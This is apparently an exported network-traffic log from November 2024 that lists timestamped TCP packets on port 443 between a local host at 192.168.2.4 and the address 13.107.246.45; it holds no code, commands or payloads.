                                                                                                                                                                                                                                            Nov 14, 2024 13:02:40.785887957 CET4434970613.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:40.786751986 CET4434970713.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:40.788611889 CET4434970713.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:40.788664103 CET49707443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:40.789371014 CET49707443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:40.789380074 CET4434970713.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:40.789390087 CET49707443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:40.789393902 CET4434970713.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:40.798291922 CET49711443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:40.798331022 CET4434971113.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:40.798399925 CET49711443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:40.799062014 CET49711443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:40.799074888 CET4434971113.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:40.801471949 CET49712443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:40.801486969 CET4434971213.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:40.801534891 CET49712443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:40.802226067 CET49712443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:40.802238941 CET4434971213.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:40.876547098 CET4434970813.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:40.877207041 CET4434970813.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:40.877294064 CET49708443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:40.877399921 CET49708443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:40.877450943 CET4434970813.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:40.877485037 CET49708443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:40.877502918 CET4434970813.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:40.881299019 CET49713443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:40.881398916 CET4434971313.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:40.881506920 CET49713443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:40.881635904 CET49713443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:40.881669998 CET4434971313.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:41.250298023 CET4434970913.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:41.252506018 CET49709443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:41.252527952 CET4434970913.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:41.253123999 CET49709443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:41.253129959 CET4434970913.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:41.381715059 CET4434970913.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:41.381982088 CET4434970913.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:41.382123947 CET49709443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:41.382168055 CET49709443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:41.382184029 CET4434970913.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:41.382194996 CET49709443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:41.382203102 CET4434970913.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:41.384341002 CET49714443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:41.384368896 CET4434971413.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:41.384500980 CET49714443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:41.384731054 CET49714443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:41.384744883 CET4434971413.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:41.405344009 CET4434971013.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:41.405867100 CET49710443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:41.405930996 CET4434971013.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:41.406238079 CET49710443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:41.406253099 CET4434971013.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:41.519697905 CET4434971213.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:41.520153046 CET49712443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:41.520160913 CET4434971213.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:41.520579100 CET49712443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:41.520584106 CET4434971213.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:41.528842926 CET4434971113.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:41.529277086 CET49711443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:41.529294014 CET4434971113.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:41.529629946 CET49711443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:41.529633999 CET4434971113.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:41.537700891 CET4434971013.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:41.537889957 CET4434971013.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:41.537978888 CET49710443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:41.537978888 CET49710443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:41.538064003 CET49710443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:41.538103104 CET4434971013.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:41.540378094 CET49715443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:41.540437937 CET4434971513.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:41.540569067 CET49715443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:41.540693045 CET49715443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:41.540723085 CET4434971513.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:41.626915932 CET4434971313.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:41.627378941 CET49713443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:41.627441883 CET4434971313.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:41.627651930 CET49713443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:41.627666950 CET4434971313.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:41.648057938 CET4434971213.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:41.648118019 CET4434971213.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:41.648188114 CET49712443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:41.648195982 CET4434971213.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:41.648233891 CET4434971213.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:41.648289919 CET49712443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:41.648365974 CET49712443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:41.648365974 CET49712443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:41.648371935 CET4434971213.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:41.648377895 CET4434971213.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:41.650382042 CET49716443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:41.650392056 CET4434971613.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:41.650449038 CET49716443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:41.650588036 CET49716443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:41.650592089 CET4434971613.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:41.658437014 CET4434971113.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:41.658832073 CET4434971113.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:41.658907890 CET49711443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:41.658965111 CET49711443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:41.658973932 CET4434971113.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:41.658982038 CET49711443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:41.658986092 CET4434971113.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:41.661050081 CET49717443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:41.661137104 CET4434971713.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:41.661216974 CET49717443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:41.661345005 CET49717443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:41.661381960 CET4434971713.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:41.757885933 CET4434971313.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:41.758032084 CET4434971313.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:41.758116007 CET49713443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:41.758450985 CET49713443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:41.758493900 CET4434971313.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:41.758531094 CET49713443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:41.758548021 CET4434971313.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:41.765779972 CET49718443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:41.765793085 CET4434971813.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:41.766010046 CET49718443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:41.766256094 CET49718443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:41.766263962 CET4434971813.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:42.116173983 CET4434971413.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:42.116724014 CET49714443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:42.116735935 CET4434971413.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:42.117409945 CET49714443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:42.117413998 CET4434971413.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:42.244740963 CET4434971413.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:42.244766951 CET4434971413.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:42.244820118 CET49714443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:42.244832039 CET4434971413.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:42.245002031 CET4434971413.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:42.245048046 CET49714443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:42.245121002 CET49714443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:42.245132923 CET4434971413.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:42.248739004 CET49719443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:42.248836040 CET4434971913.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:42.248920918 CET49719443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:42.249216080 CET49719443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:42.249253035 CET4434971913.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:42.270389080 CET4434971513.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:42.270967007 CET49715443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:42.271029949 CET4434971513.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:42.271239996 CET49715443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:42.271255016 CET4434971513.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:42.394045115 CET4434971613.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:42.399740934 CET49716443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:42.399749994 CET4434971613.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:42.400325060 CET49716443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:42.400329113 CET4434971613.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:42.400460958 CET4434971513.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:42.400484085 CET4434971513.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:42.400547028 CET4434971513.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:42.400662899 CET49715443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:42.400662899 CET49715443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:42.403903961 CET49715443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:42.403903961 CET49715443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:42.403945923 CET4434971513.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:42.403976917 CET4434971513.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:42.411870003 CET4434971713.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:42.417562962 CET49717443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:42.417645931 CET4434971713.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:42.418021917 CET49717443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:42.418036938 CET4434971713.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:42.457062960 CET49720443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:42.457151890 CET4434972013.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:42.457273960 CET49720443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:42.457597971 CET49720443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:42.457629919 CET4434972013.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:42.507843971 CET4434971813.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:42.508466959 CET49718443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:42.508477926 CET4434971813.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:42.509248018 CET49718443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:42.509252071 CET4434971813.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:42.529576063 CET4434971613.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:42.529630899 CET4434971613.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:42.529699087 CET49716443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:42.529707909 CET4434971613.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:42.530107021 CET4434971613.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:42.530153990 CET49716443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:42.530256033 CET49716443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:42.530261040 CET4434971613.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:42.530303001 CET49716443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:42.530307055 CET4434971613.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:42.536767960 CET49721443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:42.536793947 CET4434972113.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:42.536871910 CET49721443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:42.537126064 CET49721443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:42.537156105 CET4434972113.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:42.547590971 CET4434971713.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:42.547787905 CET4434971713.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:42.548089027 CET49717443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:42.548089981 CET49717443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:42.548089981 CET49717443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:42.553817987 CET49729443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:42.553863049 CET4434972913.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:42.554105997 CET49729443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:42.554568052 CET49729443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:42.554584980 CET4434972913.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:42.641052961 CET4434971813.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:42.641235113 CET4434971813.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:42.641289949 CET49718443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:42.641333103 CET49718443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:42.641343117 CET4434971813.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:42.641350031 CET49718443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:42.641355991 CET4434971813.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:42.643802881 CET49731443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:42.643841028 CET4434973113.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:42.643999100 CET49731443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:42.644175053 CET49731443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:42.644190073 CET4434973113.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:42.856620073 CET49717443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:42.856700897 CET4434971713.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:42.992862940 CET4434971913.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:42.993519068 CET49719443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:42.993582964 CET4434971913.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:42.993818045 CET49719443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:42.993834019 CET4434971913.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:43.124392986 CET4434971913.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:43.124459028 CET4434971913.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:43.124598980 CET49719443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:43.124707937 CET49719443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:43.124707937 CET49719443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:43.124753952 CET4434971913.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:43.124783993 CET4434971913.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:43.127187967 CET49732443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:43.127276897 CET4434973213.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:43.127357960 CET49732443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:43.127470016 CET49732443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:43.127492905 CET4434973213.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:43.190280914 CET4434972013.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:43.190836906 CET49720443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:43.190908909 CET4434972013.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:43.191087008 CET49720443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:43.191103935 CET4434972013.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:43.278739929 CET4434972113.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:43.279303074 CET49721443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:43.279362917 CET4434972113.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:43.279630899 CET49721443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:43.279648066 CET4434972113.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:43.283236027 CET4434972913.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:43.283562899 CET49729443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:43.283571959 CET4434972913.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:43.283942938 CET49729443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:43.283947945 CET4434972913.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:43.321281910 CET4434972013.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:43.321333885 CET4434972013.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:43.321521044 CET49720443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:43.321521997 CET49720443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:43.321589947 CET49720443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:43.321621895 CET4434972013.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:43.323955059 CET49733443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:43.324011087 CET4434973313.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:43.324085951 CET49733443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:43.324214935 CET49733443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:43.324239969 CET4434973313.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:43.377504110 CET4434973113.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:43.377851963 CET49731443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:43.377868891 CET4434973113.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:43.378249884 CET49731443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:43.378258944 CET4434973113.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:43.409492016 CET4434972113.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:43.409641981 CET4434972113.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:43.409713030 CET49721443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:43.409786940 CET49721443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:43.409786940 CET49721443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:43.409806013 CET4434972113.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:43.409830093 CET4434972113.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:43.412192106 CET49734443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:43.412235975 CET4434973413.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:43.412337065 CET49734443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:43.412481070 CET49734443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:43.412517071 CET4434973413.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:43.414788008 CET4434972913.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:43.414846897 CET4434972913.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:43.414973021 CET49729443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:43.415031910 CET49729443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:43.415031910 CET49729443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:43.415045023 CET4434972913.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:43.415052891 CET4434972913.107.246.45192.168.2.4
